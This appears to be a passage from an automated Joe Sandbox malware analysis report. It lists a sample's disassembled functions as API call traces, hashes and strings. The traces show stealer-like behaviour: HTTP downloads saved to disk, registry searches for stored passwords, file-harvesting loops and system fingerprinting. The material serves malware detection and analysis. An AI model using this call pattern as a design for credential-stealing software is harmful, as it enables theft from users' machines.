CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00820FC1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00820FCD

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID:
API String ID: 1395395982-0
Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
Instruction ID: 656666086e653bd36fe892bb46ad35c63ca3a9bce428b080829c7fa64719a3f5
Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
Instruction Fuzzy Hash: D56163B5500128ABCB18EBA4ED56FED7738FF44704F404599B706A6082EA746BC8CF5A

Function 00814AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00814B7C
StrCmpCA.SHLWAPI(?,0064A480), ref: 00814BA1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00814D21
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0081504F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0081506B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0081507F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008150B0
InternetCloseHandle.WININET(00000000), ref: 00815114
InternetCloseHandle.WININET(00000000), ref: 0081512C
HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00814D7C

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

InternetCloseHandle.WININET(00000000), ref: 00815136

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID:
API String ID: 2402878923-0
Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
Instruction ID: f19ed5f28735eb7a3bf113a36baf7173be61c7b6b3ef2dd4ee17fcc6433733da
Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
Instruction Fuzzy Hash: 9B129871910228EBCB19EB94ED92EEEB779FF15700F504199B106A2491DF742BC8CF52

Function 008164E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00816548
StrCmpCA.SHLWAPI(?,0064A480), ref: 0081656A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0081659C
HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 008165EC
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00816626
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816638
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00816664
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008166D4
InternetCloseHandle.WININET(00000000), ref: 00816756
InternetCloseHandle.WININET(00000000), ref: 00816760
InternetCloseHandle.WININET(00000000), ref: 0081676A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 3074848878-0
Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
Instruction ID: 50e690d44d28418b47014cf64bf48fb7a91e36a93008644e1411e9e8cfeecf7c
Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
Instruction Fuzzy Hash: 10712B75A40228EBDB24DFA4DC59BEE7779FF44700F104199F10AAA190DBB56AC4CF42

Function 00829277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008292D3

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
Instruction ID: f1ad9ff5fcc23579b0ce2e6437573c35db5bcbe216d38e393a5987aeba1e3e29
Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
Instruction Fuzzy Hash: 5971E8B9A40218ABDB14EBE4DC89FEEB7B9FF49300F108508F515E7294DB34A945CB61

Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
memset.MSVCRT ref: 0041716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE

Strings

sA, xrefs: 00417111
sA, xrefs: 004172AE, 00417179, 0041717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-2614523144
Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D

Function 00827767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008277A9
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008277E6
GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082786A
RtlAllocateHeap.NTDLL(00000000), ref: 00827871
wsprintfA.USER32 ref: 008278A7

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Strings

C, xrefs: 008277B3
\, xrefs: 008277C7
B, xrefs: 008278B4, 008278BC, 00827882, 0082788A
:, xrefs: 008277C3

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$B
API String ID: 1544550907-183544611
Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction ID: ea0aae454027fa8d6ab1a8cf1b227c515dfb97a6df2768e81ff54e4ab75098bc
Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction Fuzzy Hash: 08417DB1D04268EBDB10DF94DC45BEEBBB9FF48704F100199F505A7280DB756A84CBA6

Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
task.LIBCPMTD ref: 004076FB

Strings

: , xrefs: 0040764E

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66

Function 00821612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 00821642

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

Part of subcall function 008294C7: StrStrA.SHLWAPI(?,?), ref: 008294D3

lstrcpy.KERNEL32(?,00000000), ref: 0082167E

Part of subcall function 008294C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 008294F7
Part of subcall function 008294C7: lstrlen.KERNEL32(?), ref: 0082950E
Part of subcall function 008294C7: wsprintfA.USER32 ref: 0082952E

lstrcpy.KERNEL32(?,00000000), ref: 008216C6
lstrcpy.KERNEL32(?,00000000), ref: 0082170E
lstrcpy.KERNEL32(?,00000000), ref: 00821755
lstrcpy.KERNEL32(?,00000000), ref: 0082179D
lstrcpy.KERNEL32(?,00000000), ref: 008217E5
lstrcpy.KERNEL32(?,00000000), ref: 0082182C
lstrcpy.KERNEL32(?,00000000), ref: 00821874

Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC

strtok_s.MSVCRT ref: 008219B7

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
String ID:
API String ID: 4276352425-0
Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
Instruction ID: 8cf4969d5b8d08c2f20ca9bdc189b48b2e8498ca1db580035b46cc7b00906d63
Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
Instruction Fuzzy Hash: 957143B695012CABCB14EBA4EC89EEE7379FF64300F044598F149E2141EA75ABC4CF52

Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407314
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B

task.LIBCPMTD ref: 00407555

Strings

Password, xrefs: 00407401

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5

Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,008C94C0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414801
lstrcatA.KERNEL32(?,?), ref: 00414820
lstrcatA.KERNEL32(?,?), ref: 00414834
lstrcatA.KERNEL32(?,00894AE0), ref: 00414847
lstrcatA.KERNEL32(?,?), ref: 0041485B
lstrcatA.KERNEL32(?,008C9B60), ref: 0041486F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD

Strings

0aA, xrefs: 004148F9, 004148A1, 004148A4

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0aA
API String ID: 167551676-2786531170
Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99

Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008C93D0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008C93D0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
__aulldiv.LIBCMT ref: 00418172
__aulldiv.LIBCMT ref: 00418180
wsprintfA.USER32 ref: 004181AC

Strings

%d MB, xrefs: 004181A3
@, xrefs: 0041814D

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9

Function 00816307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0

InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00816376
StrCmpCA.SHLWAPI(?,0064A480), ref: 008163AE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008163F6
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0081641A
InternetReadFile.WININET(?,?,00000400,?), ref: 00816443
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00816471
CloseHandle.KERNEL32(?,?,00000400), ref: 008164B0
InternetCloseHandle.WININET(?), ref: 008164BA
InternetCloseHandle.WININET(00000000), ref: 008164C7

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
Instruction ID: 3bad36f59de9c6d2cac803e3f260b1953df843a2a09ceb775435df6b0022613f
Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
Instruction Fuzzy Hash: 40516AB5A40218ABDB24DFA4DC45BEE7779FF04705F108098B605A7180EBB46AC5CF96

Function 00824FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00824FEE

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

lstrcat.KERNEL32(?,00000000), ref: 00825017
lstrcat.KERNEL32(?,00421000), ref: 00825034

Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824B93
Part of subcall function 00824B77: FindFirstFileA.KERNEL32(?,?), ref: 00824BAA

memset.MSVCRT ref: 0082507A
lstrcat.KERNEL32(?,00000000), ref: 008250A3
lstrcat.KERNEL32(?,00421020), ref: 008250C0

Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
Part of subcall function 00824B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
Part of subcall function 00824B77: FindClose.KERNEL32(000000FF), ref: 00824DF9

memset.MSVCRT ref: 00825106
lstrcat.KERNEL32(?,00000000), ref: 0082512F
lstrcat.KERNEL32(?,00421038), ref: 0082514C

Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824C17
Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00824C2C
Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824C49
Part of subcall function 00824B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00824C85
Part of subcall function 00824B77: lstrcat.KERNEL32(?,0064A524), ref: 00824CB1
Part of subcall function 00824B77: lstrcat.KERNEL32(?,00420FF8), ref: 00824CC3
Part of subcall function 00824B77: lstrcat.KERNEL32(?,?), ref: 00824CD7
Part of subcall function 00824B77: lstrcat.KERNEL32(?,00420FFC), ref: 00824CE9
Part of subcall function 00824B77: lstrcat.KERNEL32(?,?), ref: 00824CFD
Part of subcall function 00824B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00824D13
Part of subcall function 00824B77: DeleteFileA.KERNEL32(?), ref: 00824D98

memset.MSVCRT ref: 00825192

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 4017274736-0
Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
Instruction ID: 48c60d13f30f21137bd8b5da6674792088ba395a8397ad571404d208adf62428
Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
Instruction Fuzzy Hash: 79418579A4022867DB14F7B0EC47FE97738EF24701F404494B685A61C1EEB997D88BA3

Function 00828367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00828397
RtlAllocateHeap.NTDLL(00000000), ref: 0082839E
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008283BF
__aulldiv.LIBCMT ref: 008283D9
__aulldiv.LIBCMT ref: 008283E7
wsprintfA.USER32 ref: 00828413

Strings

@, xrefs: 008283B4

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @
API String ID: 2774356765-2766056989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: d742387dc86be4e8b7af51a7e7c811a5f5cf9c4484f2a81572333488ed03e377
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: CC214AB1E44218ABDB00DFD4DC49FAEBBB9FB44B14F204619F605BB2C0C77869008BA5

Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

